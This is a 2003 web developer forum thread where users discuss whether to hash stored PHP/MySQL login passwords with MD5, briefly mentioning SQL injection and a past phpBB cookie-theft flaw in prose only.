|
-
Jul 1st, 2003, 06:30 AM
#1
Thread Starter
Hyperactive Member
User Authentication Security
How secure is a php script that retrieves user login via php script and stores it in a MySQL DB? I'd have thought bar anyone gaining access to the DB, very... is this somewhat naive?
Why would I want to use encryption on the user's passwords, such as MD5? Would this be solely to provide my users with a sense of personal security from the script's host?
Just wanting some informed opinions. 
-
Jul 1st, 2003, 11:50 AM
#2
Stuck in the 80s
The only reason I provide md5() in my applications where there are multiple users is so that admin's cannot look in the database, find out the password, and then mess with their account.
Of course, if they knew a little PHP, then they could just replace the password with another hashed one...but if they know PHP, there's probably very little that can be done to prevent it.
-
Jul 1st, 2003, 11:53 AM
#3
Thread Starter
Hyperactive Member
That's what I figured. :S
So, the advantage of it is only to give the users of the forum some assurance that whatever passwords they use, can't be seen by others who may have access to the account details... or anyone that hacks into the account's data area.
Thanks
-
Jul 1st, 2003, 05:33 PM
#4
Frenzied Member
no it isn't for the assurance of the users. they dont' even know how it is stored unless it says in text somewhere.
it is very possible to hack a mysql database if the codeing is not good hence the reason to keep the passwords encrypted, not just for the admins.
-
Jul 1st, 2003, 05:41 PM
#5
Thread Starter
Hyperactive Member
no it isn't for the assurance of the users. they dont' even know how it is stored unless it says in text somewhere.
Precisely. Which should be accepted as is from a trusted source... hopefully. 
it is very possible to hack a mysql database if the codeing is not good hence the reason to keep the passwords encrypted, not just for the admins.
Which goes back to what I was saying before... I think.
-----------
So, the advantage of it is only to give the users of the forum some assurance that whatever passwords they use, can't be seen by others who may have access to the account details... or anyone that hacks into the account's data area.
-----------
As always, thanks guys.
-
Jul 1st, 2003, 05:50 PM
#6
Frenzied Member
I think you missed something. the users of the forum have no idea the passwords are encrypted. the reason is they can't see in the database themselves.
the main reasons we encrypt passwords is becasue we don't want our software hacked and then people wouldn't trust it and never by it.
it is the makers of the forum, not the users.
not jsut forums but think about if we had credit card numbers (pretty stupid but it has been done) in the database and no encryption and somebody hacked the database. they would get all those cc #'s and the users name and password. the users would be furious because the makers didn't encrypt the passwords. so it is up to the script makers to protect there investment. it isn't to reassure the users.
-
Jul 27th, 2003, 10:26 PM
#7
Lively Member
idea
Sorry, but I skimmed what everyone else wrote.... so they might have already stated what I am about to say.
You should keep user name, password, database stuff all stored in a seperate file so if you give out your code you don't have to worry about people seeing that information. (Stored in Variables)
Encryption is also a MUST!!! Why encrypt the login and password you ask? Because of Injection attacks. I can hack your site without knowing the password in most cases. By using encryption functions... you are more safe. For more information you can read some papers I wrote on the subject at
www.jotdot.net/brandito/authentic
There are also some other ways to secure your logins... but you don't need to worry about them if you design your pages correctly. (by the way... cookie authentication is easy to hack)
hope that helps,
Brandito
Master of Cyber Fu - A Temple of Digital Chi
-
Jul 27th, 2003, 11:04 PM
#8
Frenzied Member
Re: idea
Originally posted by Brandito
(by the way... cookie authentication is easy to hack)
hope that helps,
Brandito
and how do you figure that? can you give an example or something to back that statement up?
-
Jul 27th, 2003, 11:09 PM
#9
Lively Member
yes
There are many reasons and examples why. But of course it is all on how you implement it and how secure your site is. If your site is poorly programmed... have cookie authentication will rape you every time.
example: phpbb was flawed by an html injection attack allowing everyone who went to a maliciously coded post to send there cookie authentication data to the "hacker". There are many other examples.
l8r,
Brandito
again... it is all based on your implementation
Master of Cyber Fu - A Temple of Digital Chi
-
Jul 28th, 2003, 02:35 AM
#10
Thread Starter
Hyperactive Member
Thanks Brandito, that was an interesting read and has given me something else to think about. I'm going to try these sql injection attacks out on my site.
Hopefully it'll be ok as I've already considered malicious data entry as it seems to be covered in published PHP works too (to a small degree).
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|
Reply With Quote